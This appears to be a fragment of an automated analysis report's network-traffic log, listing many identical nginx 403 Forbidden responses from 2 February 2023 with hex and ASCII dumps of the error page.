            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:06 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:06 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:07 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:08 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:08 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:09 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:09 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:10 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:10 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:11 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:11 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:12 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:13 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:13 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:14 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:14 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:15 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:16 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:16 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:17 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:17 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:18 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:19 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:19 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:20 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:20 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
